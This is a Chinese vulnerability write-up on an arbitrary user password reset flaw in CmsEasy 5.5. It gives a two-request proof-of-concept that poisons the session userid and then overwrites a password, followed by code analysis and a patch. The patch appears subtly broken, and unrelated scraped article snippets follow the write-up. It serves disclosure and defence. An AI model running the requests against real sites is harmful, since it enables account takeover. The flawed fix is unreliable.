catalog

. 漏洞描述

. 漏洞触发条件

. 漏洞影响范围

. 漏洞代码分析

. 防御方法

. 攻防思考

1. 漏洞描述

攻击者通过构造特殊的HTTP包,可以直接重置任意用户(包括管理员)的密码

Relevant Link:

http://www.cmseasy.cn/patch/show_919.html

2. 漏洞触发条件

0x1: POC

. 首先利用search_action控制userid的值

http://localhost/CmsEasy_5.5/index.php?case=form&act=search&catid=8&form=my_yingpin

POST

keyword=|userid|i:;""\

. 利用edit_action修改用户密码和其它资料

http://localhost/CmsEasy_5.5/index.php?case=user&act=edit

POST

password=3e503e8736acae9b3893629da7008fc0&nickname=ali&question=ali&answer=ali&qq=&e_mail=%40test.com&tel=&address=&intro=&submit=%E6%8F%%E4%BA%A4

3. 漏洞影响范围

4. 漏洞代码分析

/lib/default/user_act.php

function edit_action()

{

    if(front::post('submit'))

    {

        unset(front::$post['groupid']);

        unset(front::$post['powerlist']);

        if(!is_email(front::$post['e_mail']))

        {

            alerterror('邮箱格式不对');

        }

        foreach (front::$post as $k => $v)

        {

            if(is_array($v) && !empty($v))

            {

                front::$post[$k] = implode(',', $v);

            }

            front::check_type(front::post($k), 'safe');

        }

        //通过取session的userid字段更新该用户资料

        $this->_user->rec_update(front::$post,'userid='.session::get('userid'));

        front::flash(lang('修改资料成功!'));

        front::redirect(url::create('user/index'));

    }

    $this->view->data=$this->view->user;

}

edit_action函数实现修改用户资料,通过取sesson中的userid字段来更改。所以攻击路径必须能控制生成session中的userid字段,控制生成session的函数位置: /lib/default/form_act.php
我们继续回溯这个漏洞

function search_action()

{

    if(front::get('keyword') &&!front::post('keyword'))

    {

        front::$post['keyword']=front::get('keyword');

    }

    front::check_type(front::post('keyword'),'safe');

    //获取POST数据中的keyword参数

    if(front::post('keyword'))

    {

        $this->view->keyword=trim(front::post('keyword'));

        if(inject_check($this->view->keyword))

        {

            exit('非法请求!');

        }

        //通过恶意检测之后,通过session保存keyword参数

        session::set('keyword',$this->view->keyword);

    }

    else

    {

        session::set('keyword',null);

        $this->view->keyword=session::get('keyword');

    }

    if(inject_check($this->view->keyword))

    {

        exit('非法请求!');

    }

    var_dump($this->view->keyword);

    $type = $this->view->type;

    $condition = "";

    if(front::post('catid'))

    {

        $condition .= "catid = '".front::post('catid')."' AND ";

    }

    $condition .= "(title like '%".$this->view->keyword."%'";

    $sets=settings::getInstance()->getrow(array('tag'=>'table-fieldset'));

    $arr = unserialize($sets['value']);

    if(is_array($arr['archive']) &&!empty($arr['archive']))

    {

        foreach ($arr['archive'] as $v)

        {

            if($v['issearch'] == '')

            {

                $condition .= " OR {$v['name']} like '%{$this->view->keyword}%'";

            }

        }

    }

    $condition .= ")";

    $order = "`listorder` desc,1 DESC";

    $limit=(($this->view->page-)*$this->pagesize).','.$this->pagesize;

    $articles=$this->archive->getrows($condition,$limit,$order);

    foreach($articles as $order=>$arc)

    {

        $articles[$order]['url']=archive::url($arc);

        $articles[$order]['catname']=category::name($arc['catid']);

        $articles[$order]['caturl']=category::url($arc['catid']);

        $articles[$order]['adddate']= sdate($arc['adddate']);

        $articles[$order]['stitle']= strip_tags($arc['title']);

    }

    $this->view->articles=$articles;

    $this->view->archives=$articles;

    $this->view->record_count=$this->archive->record_count;

}

从访问控制的角度来看,这个漏洞有两个原因导致

. session不应该由攻击者随便修改,导致keyword被注入修改,这是一个平行权限漏洞

. 修改密码的入口来自于"用户资料修改",UI界面上只提供了普通身份资料的修改,但是因此MVC框架对POST数据进行了遍历,取出所有字段并进行了数据表更新操作,导致发生了表单字段注入

5. 防御方法

将代码逻辑和UI逻辑进行统一,防止出现表单字段注入
/lib/default/user_act.php

function edit_action()

{

    if(front::post('submit'))

    {

        unset(front::$post['groupid']);

        unset(front::$post['powerlist']);

        if(!is_email(front::$post['e_mail']))

        {

        alerterror('邮箱格式不对');

        }

        /**/

        $tmp = front::$post;

        if ( array_key_exists("password", $tmp['password']) )

        {

        unset($tmp['password']);

        }

        front::$post = $tmp;

        /**/

        foreach (front::$post as $k => $v)

        {

            if(is_array($v) && !empty($v))

        {

                front::$post[$k] = implode(',', $v);

            }

            front::check_type(front::post($k), 'safe');

        }

        //通过取session的userid字段更新该用户资料

        $this->_user->rec_update(front::$post,'userid='.session::get('userid'));

        front::flash(lang('修改资料成功!'));

        front::redirect(url::create('user/index'));

    }

    $this->view->data=$this->view->user;

}

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

CMSEASY /lib/tool/front_class.php、/lib/default/user_act.php arbitrary user password reset vulnerability的更多相关文章

  1. 创建DLL、Lib以及使用DLL、Lib

    1.要在生成DLL文件的同时生成Lib文件,函数声明时前面要加__declspec(dllexport). 可在头文件中如下定义: #ifndef __MYDLL_H#define __MYDLL_H ...

  2. Singleton、MultiThread、Lib——实现单实例无锁多线程安全API

        前阵子写静态lib导出单实例多线程安全API时,出现了CRITICAL_SECTION初始化太晚的问题,之后查看了错误的资料,引导向了错误的理解,以至于今天凌晨看到另一份代码,也不多想的以为s ...

  3. .h头文件、 .lib库文件、 .dll动态链接库文件之间的关系

    转自.h头文件. .lib库文件. .dll动态链接库文件之间的关系 h头文件作用:声明函数接口 dll动态链接库作用:含有函数的可执行代码 lib库有两种: (1)静态链接库(Static Liba ...

  4. 如何在项目中引入 #include .h、.lib、 .dll、.cpp (转)

    源:http://blog.csdn.net/vippolka/article/details/8552735 在项目中引入.h..lib和dll.以及.cpp 1..h的引入 解决办法1:把  XX ...

  5. [转]静态库、动态库,dll文件、lib文件,隐式链接、显式链接

    转自:https://blog.csdn.net/dcrmg/article/details/53427181 静态链接.动态链接 静态库和动态库分别应用在静态链接方式和动态链接方式中,所谓静态链接方 ...

  6. dll、lib(动态链接库、静态链接库)的区别

    1.dll:dynamic link library: lib:static link library. 2.windows系统中,许多app并不是仅由一个完整的exe构成,而是按功能分成了若干部分, ...

  7. 静态库、动态库,dll文件、lib文件,隐式链接、显式链接浅见

    静态链接.动态链接 静态库和动态库分别应用在静态链接方式和动态链接方式中,所谓静态链接方式是指在程序执行之前完成所有的链接工作,把静态库一起打包合入,生成一个可执行的目标文件(EXE文件).所谓动态链 ...

  8. .lib .dll 区别介绍、使用(dll的两种引入方式)

    .lib .dll文件都是程序可直接引用的文件,前者就是所谓的库文件,后者是动态链接库(Dynamic Link Library)也是一个库文件.而.pdb则可以理解为符号表文件.DLL(Dynami ...

  9. 通过离线安装包解决了 from cryptography.hazmat.bindings._openssl import ffi, lib ImportError: /usr/local/python36/lib/python3.6/site-packages/cryptography-2.2.2-py3.6-linux-x86_64.egg/cryptography/hazmat/binding

    场景:内网服务器不能上外网(代理也不通!), 之前安装了PYTHON的几个安装包,但不是知道为什么无法使用PARAMIKO这个模块 在导入 from cryptography.hazmat.bindi ...

随机推荐

  1. KindEditor得不到textarea值的解决方法

    转自:http://blog.phpha.com/archives/510.html 以前有朋友遇到过这个问题,就是KindEditor在火狐下或者其他浏览器下都无法得到textarea文本框的值,点 ...

  2. 基于VirtualBox安装Ubuntu图文教程

    基于VirtualBox虚拟机安装Ubuntu图文教程 一. 下载安装VirtualBox 官网下载VirtualBox,目前版本:VirtualBox 5.1.8 for Windows hosts ...

  3. PhoneGap: Android平台入门例子(Hello World)

    Hello World Demo: http://docs.phonegap.com/en/2.0.0/guide_getting-started_android_index.md.html#Gett ...

  4. github开源:企业级应用快速开发框架CIIP WEB+WIN+移动端

    简介 CIIP是基于XAF开发的开源信息系统框架.CIIP最常见的应用场景是基于数据库的企业级应用程序,例如供应链系统,ERP系统,MRP系统,CRM系统等. CIIP支持WEB版本.Windows桌 ...

  5. Android中的Semaphore

    信号量,了解过操作系统的人都知道,信号量是用来做什么的··· 在Android中,已经提供了Semaphore来帮助我们使用~ 那么,在开发中这家伙有什么用呢? 用的地方不多,但是却真的是好用至极! ...

  6. Web Api通过Route、RoutePrefix等特性设置路由

    [Route("customers/{customerId}/orders")] [HttpGet] public IEnumerable<Order> FindOrd ...

  7. JavaScript学习笔记- 正则表达式常用字符集及方法

    正则表达式修饰符(修饰符 可以在全局搜索中不区分大小写) i(ignoreCase)执行对大小写不敏感的匹配 g (global)     执行全局匹配(查找所有匹配而非在找到第一个匹配后停止) m( ...

  8. Js中Prototype、__proto__、Constructor、Object、Function关系介绍

    一. Prototype.__proto__与Object.Function关系介绍 Function.Object:都是Js自带的函数对象.prototype,每一个函数对象都有一个显式的proto ...

  9. vim 插件管理

    1 进入自己的vim mkdir ./bundle/vundle 2 在vimrc同级中执行 git clone https://github.com/gmarik/vundle.git ./bund ...

  10. java中的重绘

    void java.awt.Container.validate()Validates this container and all of its subcomponents.这个函数更新容器及其全部 ...